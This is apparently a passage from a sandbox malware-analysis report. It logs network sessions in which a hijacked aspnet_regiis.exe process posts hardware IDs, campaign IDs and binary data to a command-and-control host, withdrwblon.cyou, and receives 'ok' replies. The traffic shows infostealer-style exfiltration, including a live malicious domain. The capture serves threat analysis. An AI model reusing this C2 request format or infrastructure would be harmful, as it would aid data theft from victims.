2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 5a 62 70 76 4f 50 52 37 31 49 32 71 30 58 6e 57 32 36 6a 4c 68 2b 4d 6a 58 58 71 6f 7a 62 5a 68 4b 33 47 55 34 50 4a 65 79 59 4e 4e 75 6d 30 30 38 57 43 62 74 2b 66 45 4f 4d 79 62 71 4d 33 4e 74 47 6c 52 63 71 62 49 76 57 35 6f 4e 39 2f 31 36 67 79 58 7a 6d 75 74 65 7a 62 7a 66 4e 71 66 72 64 56 77 31 74 4b 6b 79 49 6a 72 4c 52 6b 35 35 63 79 75 49 54 4e 2f 39 65 72 68 45 70 76 55 62 76 39 69 66 65 51 32 33 6f 48 6e 67 7a 62 52 32 71 76 41 69 65 49 6e 58 58 75 6a 78 62 74 75 62 54 58 55 34 4f 41 57 6d 63 4a 6a 74 48 49 7a 2b 48 76 64 69 36 76 61 63 35 57 56 37 38 61 56 72 48 45 5a 57 61 4c 49 70 43 4e 65 50 4e 72 70 37 51 6a 52 33 43 43 6d 50 54 54 78 4e 6f 48 4e 71 64 35 35 78 39 71 39 78 49 50 2b 4a 56 78 78 71 4d 69 34 59 57 34 34 32 65 6e 73 47 5a 4c Data Ascii: ZbpvOPR71I2q0XnW26jLh+MjXXqozbZhK3GU4PJeyYNNum008WCbt+fEOMybqM3NtGlRcqbIvW5oN9/16gyXzmutezbzfNqfrdVw1tKkyIjrLRk55cyuITN/9erhEpvUbv9ifeQ23oHngzbR2qvAieInXXujxbtubTXU4OAWmcJjtHIz+Hvdi6vac5WV78aVrHEZWaLIpCNePNrp7QjR3CCmPTTxNoHNqd55x9q9xIP+JVxxqMi4YW442ensGZL
2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 54 54 78 4e 6f 48 4e 71 39 4a 32 33 74 47 72 77 59 72 68 4c 46 70 77 70 73 61 78 61 32 55 34 30 4f 76 6a 45 35 66 44 61 62 74 34 49 66 68 2f 31 59 48 6e 6c 54 62 53 77 2b 2b 5a 7a 63 4d 75 54 33 53 4b 79 4b 64 6f 4b 79 43 61 2f 71 6f 5a 6e 59 4d 32 2f 33 6f 32 39 58 33 66 68 61 66 4a 63 39 76 51 72 73 75 4c 37 53 52 56 63 61 58 4b 74 6d 64 6e 50 39 50 67 2b 41 79 55 78 58 79 31 50 58 32 39 63 63 48 4e 2f 35 74 41 78 63 79 2b 31 38 2f 5a 4b 6c 64 35 6f 74 33 32 66 69 55 6d 6c 4f 44 6d 58 73 6d 44 5a 62 39 78 4e 50 56 77 33 59 57 6f 31 48 2f 48 32 71 50 50 6e 2b 73 70 55 48 6d 71 78 37 39 73 62 44 4c 66 37 65 63 61 6c 73 49 75 38 54 30 30 35 54 61 42 7a 5a 48 4c 65 39 6e 31 70 4d 32 45 72 44 59 58 62 75 58 4d 75 69 45 7a 66 39 44 72 34 68 53 65 79 6d 53 31 Data Ascii: TTxNoHNq9J23tGrwYrhLFpwpsaxa2U40OvjE5fDabt4Ifh/1YHnlTbSw++ZzcMuT3SKyKdoKyCa/qoZnYM2/3o29X3fhafJc9vQrsuL7SRVcaXKtmdnP9Pg+AyUxXy1PX29ccHN/5tAxcy+18/ZKld5ot32fiUmlODmXsmDZb9xNPVw3YWo1H/H2qPPn+spUHmqx79sbDLf7ecalsIu8T005TaBzZHLe9n1pM2ErDYXbuXMuiEzf9Dr4hSeymS1
2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 44 57 7a 65 6d 62 63 63 32 62 39 34 47 69 79 78 77 62 56 70 2b 4c 71 53 39 79 66 39 50 72 71 6b 62 52 7a 32 32 7a 64 54 7a 37 66 39 57 48 72 74 42 36 33 74 2b 6a 79 49 6a 71 4b 46 78 79 70 4d 2b 36 61 32 30 38 31 2b 6a 6c 45 5a 6d 44 49 50 39 36 4b 37 30 75 6d 61 69 77 30 48 6a 54 6d 37 43 50 6c 4b 77 75 56 54 66 39 69 37 70 6f 62 54 6e 52 36 2b 73 59 6d 63 5a 6d 75 33 77 31 2b 33 58 57 69 61 4c 61 65 64 48 58 6f 63 75 4d 37 53 56 53 65 4b 37 4f 39 69 38 72 4f 4d 79 6e 73 6c 36 67 77 48 69 6f 62 54 2b 39 61 5a 65 55 35 39 78 36 6c 59 50 76 77 4a 2f 6d 49 31 64 79 71 73 36 31 62 6d 77 79 30 75 76 67 46 35 6e 46 59 62 5a 76 4d 50 46 34 33 6f 4f 72 31 58 76 66 32 4b 4b 42 77 36 77 75 51 54 66 39 69 35 70 6d 5a 68 48 66 36 2b 31 65 6a 6f 31 33 2f 33 6f 2f 76 Data Ascii: DWzembcc2b94GiyxwbVp+LqS9yf9PrqkbRz22zdTz7f9WHrtB63t+jyIjqKFxypM+6a2081+jlEZmDIP96K70umaiw0HjTm7CPlKwuVTf9i7pobTnR6+sYmcZmu3w1+3XWiaLaedHXocuM7SVSeK7O9i8rOMynsl6gwHiobT+9aZeU59x6lYPvwJ/mI1dyqs61bmwy0uvgF5nFYbZvMPF43oOr1Xvf2KKBw6wuQTf9i5pmZhHf6+1ejo13/3o/v
2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 6e 37 58 48 46 79 36 79 44 76 50 6f 71 54 33 79 6f 78 2f 5a 2b 4a 53 61 55 34 4f 5a 65 79 59 4e 6f 73 48 51 77 38 6e 66 51 67 61 72 65 66 39 44 61 71 63 57 48 35 69 6c 66 63 61 54 4f 76 47 4a 71 4e 64 33 67 34 68 6d 53 30 53 37 78 50 54 54 6c 4e 6f 48 4e 6a 74 78 6b 32 38 76 76 33 73 50 31 61 56 35 37 35 5a 50 32 5a 57 45 77 30 4f 44 6d 47 4a 54 46 59 37 35 79 4d 76 31 35 33 59 61 75 33 58 66 59 33 71 4c 46 6e 2b 59 69 56 6e 75 73 78 37 73 68 4a 58 2f 54 2f 36 70 47 30 66 4a 6a 73 58 4d 30 36 7a 62 47 77 37 36 62 63 64 6d 62 39 34 47 4d 34 43 5a 61 65 4b 62 49 74 32 74 35 4c 64 6a 75 34 68 75 64 79 47 43 35 62 7a 58 79 66 39 71 4f 72 74 78 2b 32 64 47 73 78 73 32 69 61 56 35 76 35 5a 50 32 51 6e 77 76 32 61 66 31 55 49 69 44 61 62 4d 39 61 37 31 2b 31 49 Data Ascii: n7XHFy6yDvPoqT3yox/Z+JSaU4OZeyYNosHQw8nfQgaref9DaqcWH5ilfcaTOvGJqNd3g4hmS0S7xPTTlNoHNjtxk28vv3sP1aV575ZP2ZWEw0ODmGJTFY75yMv153Yau3XfY3qLFn+YiVnusx7shJX/T/6pG0fJjsXM06zbGw76bcdmb94GM4CZaeKbIt2t5Ldju4hudyGC5bzXyf9qOrtx+2dGsxs2iaV5v5ZP2Qnwv2af1UIiDabM9a71+1I
2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 33 4e 4b 72 79 59 37 73 4c 56 31 77 6f 4d 69 36 61 6d 77 38 32 2b 50 6a 45 4a 6a 4d 4c 76 45 39 4e 4f 55 32 67 63 32 47 77 48 58 5a 31 75 2f 65 77 2f 56 70 58 6e 76 6c 6b 2f 5a 74 5a 54 72 55 37 65 77 61 6c 4d 56 6b 75 6e 30 34 2f 6e 6e 64 69 36 50 55 64 74 37 53 72 73 65 49 35 69 4a 66 65 71 62 4e 73 43 45 6c 66 39 50 2f 71 6b 62 52 34 33 57 79 63 54 53 39 61 5a 65 55 35 39 78 36 6c 59 50 76 79 6f 48 6f 4c 6c 6c 36 70 73 4f 7a 5a 57 45 36 31 4f 2f 34 46 70 48 45 66 4b 31 39 4f 76 68 36 32 6f 32 6a 33 58 2f 54 32 4b 75 42 77 36 77 75 51 54 66 39 69 35 74 74 62 42 62 54 2f 4b 6f 42 33 39 6f 75 75 48 46 7a 70 54 62 59 68 71 33 55 65 39 62 64 72 4d 71 49 35 69 68 65 66 36 6a 5a 74 57 35 6b 4f 39 54 6f 37 42 69 51 7a 47 69 34 64 44 4c 31 63 5a 6e 44 35 39 78 Data Ascii: 3NKryY7sLV1woMi6amw82+PjEJjMLvE9NOU2gc2GwHXZ1u/ew/VpXnvlk/ZtZTrU7ewalMVkun04/nndi6PUdt7SrseI5iJfeqbNsCElf9P/qkbR43WycTS9aZeU59x6lYPvyoHoLll6psOzZWE61O/4FpHEfK19Ovh62o2j3X/T2KuBw6wuQTf9i5ttbBbT/KoB39ouuHFzpTbYhq3Ue9bdrMqI5ihef6jZtW5kO9To7BiQzGi4dDL1cZnD59x
2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 4e 75 41 36 6a 35 49 4f 37 44 49 75 47 39 73 4b 5a 53 70 71 68 48 52 6d 31 66 2f 4e 58 50 43 4f 4a 6d 56 35 34 4d 32 34 4e 69 68 7a 34 72 36 4f 42 52 51 76 38 61 77 64 6e 70 2f 6d 71 66 73 58 73 6d 54 49 50 39 35 49 72 30 75 69 64 2f 38 6a 69 57 43 69 2f 33 65 77 2f 56 70 54 7a 66 39 6d 66 67 68 65 58 2b 4d 70 36 30 64 67 39 46 6f 76 47 73 77 75 6b 6a 6e 6f 36 44 64 63 39 4c 4c 37 65 2b 47 2b 43 34 5a 4f 65 58 45 39 6a 6c 53 66 35 79 6e 31 56 44 52 32 79 37 6e 50 51 62 2b 65 4e 65 4b 73 63 6f 37 2b 39 79 70 78 49 72 38 61 33 64 38 73 63 7a 32 4c 79 73 35 6c 4c 2b 36 55 4e 48 48 66 2f 38 6c 59 36 38 74 6a 4e 37 77 69 79 54 4b 6c 62 61 42 6d 36 78 78 43 7a 6e 6c 32 66 59 35 4b 33 6a 58 39 66 67 59 6b 74 56 74 2b 45 4d 4e 2f 6d 44 55 67 71 7a 61 53 4f 76 31 Data Ascii: NuA6j5IO7DIuG9sKZSpqhHRm1f/NXPCOJmV54M24Nihz4r6OBRQv8awdnp/mqfsXsmTIP95Ir0uid/8jiWCi/3ew/VpTzf9mfgheX+Mp60dg9FovGswukjno6Ddc9LL7e+G+C4ZOeXE9jlSf5yn1VDR2y7nPQb+eNeKsco7+9ypxIr8a3d8scz2Lys5lL+6UNHHf/8lY68tjN7wiyTKlbaBm6xxCznl2fY5K3jX9fgYktVt+EMN/mDUgqzaSOv1
2024-10-24 19:59:06 UTC	1104	IN	Data Raw: 49 6e 58 6d 47 30 68 70 46 76 62 44 37 43 39 2f 30 52 33 75 31 59 6e 6a 31 39 76 58 43 5a 31 66 57 56 4e 74 48 4b 37 35 6e 64 76 6e 49 4d 4a 50 4b 62 35 48 34 6c 4a 70 54 78 71 6b 62 44 6a 53 36 74 50 57 75 39 4d 64 71 66 74 64 31 31 77 39 6a 6f 2f 37 50 4c 4a 31 35 32 73 39 75 37 62 55 6f 38 78 65 33 55 49 49 54 41 59 4c 46 36 4a 65 77 32 6c 38 32 6f 6d 79 37 73 6d 2b 65 42 73 71 4a 70 51 54 66 39 69 34 4e 69 5a 54 48 54 38 66 74 54 74 73 31 70 76 6d 73 6a 38 48 72 34 6a 72 62 52 4e 70 75 62 71 59 48 56 76 6d 63 5a 63 37 53 4c 37 6a 45 35 5a 49 47 30 76 55 37 44 33 43 43 6d 50 53 57 39 4c 6f 76 44 35 38 6b 32 6a 5a 76 6f 77 70 2f 2b 4c 31 70 68 70 6f 79 49 58 30 34 6f 31 2f 66 73 48 61 2f 39 52 62 4e 37 4e 4f 64 78 33 36 75 48 6d 7a 69 56 31 4f 2b 5a 74 Data Ascii: InXmG0hpFvbD7C9/0R3u1Ynj19vXCZ1fWVNtHK75ndvnIMJPKb5H4lJpTxqkbDjS6tPWu9Mdqftd11w9jo/7PLJ152s9u7bUo8xe3UIITAYLF6Jew2l82omy7sm+eBsqJpQTf9i4NiZTHT8ftTts1pvmsj8Hr4jrbRNpubqYHVvmcZc7SL7jE5ZIG0vU7D3CCmPSW9LovD58k2jZvowp/+L1phpoyIX04o1/fsHa/9RbN7NOdx36uHmziV1O+Zt
2024-10-24 19:59:06 UTC	1369	IN	Data Raw: 31 64 31 63 0d 0a 6d 35 75 39 67 64 57 73 62 6c 70 6c 74 38 32 31 64 32 68 34 36 74 6e 48 44 4a 62 54 62 66 31 4d 50 76 6c 67 7a 49 36 33 33 45 6a 72 39 72 33 47 6e 65 39 72 61 47 47 6d 79 37 68 6d 4b 33 47 55 2f 36 70 47 30 65 35 38 75 47 30 77 76 57 6d 58 6c 4f 66 4e 4e 6f 32 49 34 59 47 66 72 48 45 5a 4d 4b 76 47 74 32 4a 6c 50 4d 62 31 37 42 32 48 77 43 6d 42 51 78 37 76 63 63 6d 4f 35 65 70 37 30 63 32 36 77 70 33 72 46 32 64 61 74 38 79 6d 59 69 6b 54 30 2b 72 6d 49 4b 2f 30 66 37 68 74 63 64 74 31 7a 34 37 6e 6c 54 62 4e 6d 2f 65 42 6f 50 34 75 53 58 54 6e 35 37 46 73 5a 33 2f 4c 71 66 4e 65 68 34 4d 32 37 44 4e 7a 37 7a 61 42 7a 65 44 59 5a 4d 66 64 72 4e 65 4f 71 78 64 6e 57 72 66 4d 70 6d 49 70 44 74 6e 6a 2f 41 75 53 30 32 6d 42 51 78 37 76 63 Data Ascii: 1d1cm5u9gdWsblplt821d2h46tnHDJbTbf1MPvlgzI633Ejr9r3Gne9raGGmy7hmK3GU/6pG0e58uG0wvWmXlOfNNo2I4YGfrHEZMKvGt2JlPMb17B2HwCmBQx7vccmO5ep70c26wp3rF2dat8ymYikT0+rmIK/0f7htcdt1z47nlTbNm/eBoP4uSXTn57FsZ3/LqfNeh4M27DNz7zaBzeDYZMfdrNeOqxdnWrfMpmIpDtnj/AuS02mBQx7vc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49712	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:06 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15078 Host: withdrwblon.cyou
2024-10-24 19:59:06 UTC	15078	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:06 UTC	1012	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0d998mh6kbjaroom9h338kkeb3; expires=Mon, 17 Feb 2025 13:45:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qwHl1cUpsnb0nn3e%2F6xmLlWH8leiOzrgV7YH36EjzZxdRQb3pR6R5e8T2exEn6gyrCaukheCu5t3yzesoiQHQBmXlOG%2BsAP7s5PPAdiqUx%2B2TRN98dOzs%2BREXKep4Sg5GAoe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8ba02f306c6b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1205&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16018&delivery_rate=2354471&cwnd=234&unsent_bytes=0&cid=bed1323ad22c82fd&ts=576&x=0"
2024-10-24 19:59:06 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49713	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:06 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15078 Host: withdrwblon.cyou
2024-10-24 19:59:06 UTC	15078	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:06 UTC	1014	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9q58td2nssea9fh5l1atojt3vu; expires=Mon, 17 Feb 2025 13:45:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cPefjUp9ebYpHFIDyRLm%2F%2Bq%2BCMHVOuOIdoGiGEa%2FZfP3kWvwLuOLJyRLE5NnqaAC7EOk1ESf1OAFq8AX%2BiSoWpS0ZDNH2hXjFODRvNzw8Q1lot4Gwxtnz5ZOfvndM0gkhVPH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8ba06bb42ff0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16018&delivery_rate=1775597&cwnd=239&unsent_bytes=0&cid=b2c59cf26d556d67&ts=589&x=0"
2024-10-24 19:59:06 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49714	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:07 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12836 Host: withdrwblon.cyou
2024-10-24 19:59:07 UTC	12836	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:08 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qhigko4def79lpl9pghmhfrb6j; expires=Mon, 17 Feb 2025 13:45:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QrX01Jrkk6JYnptdMu8SPSoDAp26LH5MSFoXsr4wmdGuN8UFvb51BdfLjctrfKe%2BTqdGStqY09FqHjFSj1ZL2eO3V39RPuUeCeChEhmr0LN8AZfzenko6IGINoAH51INKhq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8ba87c3de7df-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13776&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=799f7bef7b45502f&ts=589&x=0"
2024-10-24 19:59:08 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49715	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:07 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: withdrwblon.cyou
2024-10-24 19:59:07 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:07 UTC	5237	OUT	Data Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-24 19:59:08 UTC	1013	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=75bc7agecsstdd5k22mebji1o0; expires=Mon, 17 Feb 2025 13:45:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGXTqnexf5ZMOvt45tNcgHokravzCYC%2FuixcLxSDmlj007C8pi9EzvLPRfbX13ZBCfXMqncTBXNNx2tZj%2B412NQYxMDH%2BVjCvoipURkcJ%2BMTUzvbm46RDXpKTZZYx9JR6k1C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8ba90acb0b95-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1069&sent=13&recv=29&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21530&delivery_rate=2644748&cwnd=236&unsent_bytes=0&cid=70efacb47b3c2e7b&ts=750&x=0"
2024-10-24 19:59:08 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
